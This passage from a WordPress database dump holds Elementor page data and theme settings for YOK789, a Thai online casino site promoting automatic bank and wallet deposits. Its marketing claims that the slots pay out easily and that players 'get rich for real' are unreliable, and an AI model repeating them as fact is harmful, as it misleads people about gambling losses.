[]\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19 <b>YOK789<\\/b> \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e33\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e2a\\u0e23\\u0e47\\u0e08\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e07\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e21\\u0e32\\u0e13\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21\\u0e04\\u0e27\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11898c9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-Yok789.webp\",\"id\":293,\"size\":\"\",\"alt\":\"3icon\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1741422\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e33\\u0e44\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c YOK789 \\u0e16\\u0e36\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9b3a68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"2289\\\" data-end=\\\"2531\\\">\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49 <b>YOK789<\\/b> \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 <strong data-start=\\\"2353\\\" data-end=\\\"2380\\\">Auto Transaction System<\\/strong> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e08\\u0e32\\u0e01 USA \\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e15\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e17\\u0e22\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30<\\/p><p data-start=\\\"2533\\\" data-end=\\\"2575\\\"><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 <b>YOK789<\\/b> <\\/strong><\\/span><\\/p><ul><li data-start=\\\"2578\\\" data-end=\\\"2668\\\"><strong data-start=\\\"2578\\\" data-end=\\\"2617\\\">\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e17\\u0e38\\u0e01\\u0e41\\u0e2b\\u0e48\\u0e07<\\/strong> \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e01\\u0e2a\\u0e34\\u0e01\\u0e23\\u0e44\\u0e17\\u0e22, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e40\\u0e17\\u0e1e, \\u0e44\\u0e17\\u0e22\\u0e1e\\u0e32\\u0e13\\u0e34\\u0e0a\\u0e22\\u0e4c, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e28\\u0e23\\u0e35\\u0e2f \\u0e2f\\u0e25\\u0e2f<\\/li><li data-start=\\\"2671\\\" data-end=\\\"2753\\\"><strong data-start=\\\"2671\\\" data-end=\\\"2707\\\">\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a TrueMoney Wallet \\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/strong> \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23<\\/li><li data-start=\\\"2756\\\" data-end=\\\"2796\\\"><strong data-start=\\\"2756\\\" data-end=\\\"2794\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e08\\u0e31\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22 AI \\u0e2d\\u0e31\\u0e08\\u0e09\\u0e23\\u0e34\\u0e22\\u0e30<\\/strong><\\/li><li data-start=\\\"2799\\\" data-end=\\\"2866\\\"><strong data-start=\\\"2799\\\" data-end=\\\"2840\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e41\\u0e1a\\u0e1a 2 \\u0e0a\\u0e31\\u0e49\\u0e19 (2FA)<\\/strong> \\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25<\\/li><li data-start=\\\"2869\\\" data-end=\\\"2919\\\"><strong data-start=\\\"2869\\\" data-end=\\\"2903\\\">\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e15\\u0e48\\u0e2d\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23<\\/strong> \\u0e17\\u0e31\\u0e49\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e25\\u0e30\\u0e16\\u0e2d\\u0e19<\\/li><\\/ul><blockquote><p style=\\\"text-align: center;\\\" data-start=\\\"2921\\\" data-end=\\\"3018\\\"><em><strong><span style=\\\"color: #ffcc00;\\\">\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49 <b>YOK789<\\/b> \\u0e08\\u0e36\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07 \\u201c\\u0e40\\u0e23\\u0e47\\u0e27\\u201d \\u0e41\\u0e25\\u0e30 \\u201c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u201d \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e35\\u0e49<\\/span><\\/strong><\\/em><\\/p><\\/blockquote>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2250,314,'_thumbnail_id','293'),(2257,315,'_elementor_edit_mode','builder'),(2258,315,'_elementor_template_type','kit'),(2259,315,'_wp_page_template','default'),(2260,315,'_elementor_page_settings','a:56:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#A50808\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#A50808\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#FFFFFF\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#A50808\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:6:\"YOK789\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:25:\"hello_header_logo_display\";s:0:\"\";s:28:\"hello_header_tagline_display\";s:0:\"\";s:25:\"hello_header_menu_display\";s:0:\"\";s:25:\"hello_footer_logo_display\";s:0:\"\";s:28:\"hello_footer_tagline_display\";s:0:\"\";s:25:\"hello_footer_menu_display\";s:0:\"\";s:30:\"hello_footer_copyright_display\";s:0:\"\";s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:10:\"body_color\";s:7:\"#FFFFFF\";s:26:\"body_typography_typography\";s:6:\"custom\";s:27:\"body_typography_font_family\";s:6:\"Prompt\";s:25:\"body_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:17:\"link_normal_color\";s:7:\"#F5D708\";s:33:\"link_normal_typography_typography\";s:6:\"custom\";s:34:\"link_normal_typography_font_family\";s:6:\"Prompt\";s:32:\"link_normal_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:24:\"h1_typography_typography\";s:6:\"custom\";s:25:\"h1_typography_font_family\";s:6:\"Prompt\";s:23:\"h1_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:29;s:5:\"sizes\";a:0:{}}s:24:\"h2_typography_typography\";s:6:\"custom\";s:25:\"h2_typography_font_family\";s:6:\"Prompt\";s:23:\"h2_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:26;s:5:\"sizes\";a:0:{}}s:24:\"h3_typography_typography\";s:6:\"custom\";s:25:\"h3_typography_font_family\";s:6:\"Prompt\";s:23:\"h3_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:24;s:5:\"sizes\";a:0:{}}s:24:\"h4_typography_typography\";s:6:\"custom\";s:25:\"h4_typography_font_family\";s:6:\"Prompt\";s:23:\"h4_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:24:\"h5_typography_typography\";s:6:\"custom\";s:25:\"h5_typography_font_family\";s:6:\"Prompt\";s:23:\"h5_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:24:\"h6_typography_typography\";s:6:\"custom\";s:25:\"h6_typography_font_family\";s:6:\"Prompt\";s:23:\"h6_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:9:\"#0A0606FA\";s:30:\"h1_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:22;s:5:\"sizes\";a:0:{}}s:30:\"h2_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:20;s:5:\"sizes\";a:0:{}}s:30:\"h3_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:30:\"h4_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:30:\"h5_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:30:\"h6_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:15:\"activeItemIndex\";i:1;s:16:\"site_description\";s:157:\"YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง\";s:9:\"site_logo\";a:5:{s:3:\"url\";s:73:\"https://amb18b.com/wp-content/uploads/2025/10/Megabet_333_Biz_-_Logo.webp\";s:2:\"id\";i:48;s:4:\"size\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:6:\"source\";s:7:\"library\";}}'),(2261,315,'_elementor_data','[]'),(2262,315,'_elementor_version','3.32.5'),(2263,315,'_elementor_pro_version','3.32.3'),(2273,316,'_elementor_edit_mode','builder'),(2274,316,'_elementor_template_type','kit'),(2275,316,'_wp_page_template','default'),(2276,316,'_elementor_page_settings','a:56:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#268B13\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#268B13\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#FFFFFF\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#268B13\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:6:\"YOK789\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:25:\"hello_header_logo_display\";s:0:\"\";s:28:\"hello_header_tagline_display\";s:0:\"\";s:25:\"hello_header_menu_display\";s:0:\"\";s:25:\"hello_footer_logo_display\";s:0:\"\";s:28:\"hello_footer_tagline_display\";s:0:\"\";s:25:\"hello_footer_menu_display\";s:0:\"\";s:30:\"hello_footer_copyright_display\";s:0:\"\";s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:10:\"body_color\";s:7:\"#FFFFFF\";s:26:\"body_typography_typography\";s:6:\"custom\";s:27:\"body_typography_font_family\";s:6:\"Prompt\";s:25:\"body_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:17:\"link_normal_color\";s:7:\"#F5D708\";s:33:\"link_normal_typography_typography\";s:6:\"custom\";s:34:\"link_normal_typography_font_family\";s:6:\"Prompt\";s:32:\"link_normal_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:24:\"h1_typography_typography\";s:6:\"custom\";s:25:\"h1_typography_font_family\";s:6:\"Prompt\";s:23:\"h1_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:29;s:5:\"sizes\";a:0:{}}s:24:\"h2_typography_typography\";s:6:\"custom\";s:25:\"h2_typography_font_family\";s:6:\"Prompt\";s:23:\"h2_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:26;s:5:\"sizes\";a:0:{}}s:24:\"h3_typography_typography\";s:6:\"custom\";s:25:\"h3_typography_font_family\";s:6:\"Prompt\";s:23:\"h3_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:24;s:5:\"sizes\";a:0:{}}s:24:\"h4_typography_typography\";s:6:\"custom\";s:25:\"h4_typography_font_family\";s:6:\"Prompt\";s:23:\"h4_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:24:\"h5_typography_typography\";s:6:\"custom\";s:25:\"h5_typography_font_family\";s:6:\"Prompt\";s:23:\"h5_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:24:\"h6_typography_typography\";s:6:\"custom\";s:25:\"h6_typography_font_family\";s:6:\"Prompt\";s:23:\"h6_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:9:\"#0A0606FA\";s:30:\"h1_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:22;s:5:\"sizes\";a:0:{}}s:30:\"h2_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:20;s:5:\"sizes\";a:0:{}}s:30:\"h3_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:30:\"h4_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:30:\"h5_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:30:\"h6_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:15:\"activeItemIndex\";i:1;s:16:\"site_description\";s:157:\"YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง\";s:9:\"site_logo\";a:5:{s:3:\"url\";s:73:\"https://amb18b.com/wp-content/uploads/2025/10/Megabet_333_Biz_-_Logo.webp\";s:2:\"id\";i:48;s:4:\"size\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:6:\"source\";s:7:\"library\";}}'),(2277,316,'_elementor_data','[]'),(2278,316,'_elementor_version','3.35.5'),(2279,316,'_elementor_pro_version','3.32.3'),(2292,317,'_wp_attachment_image_alt','YOK789'),(2293,317,'_wp_attached_file','2026/02/cropped-cropped-Yok789-loggo.webp'),(2294,317,'_wp_attachment_context','custom-logo'),(2295,317,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1022;s:6:\"height\";i:256;s:4:\"file\";s:41:\"2026/02/cropped-cropped-Yok789-loggo.webp\";s:8:\"filesize\";i:32314;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s: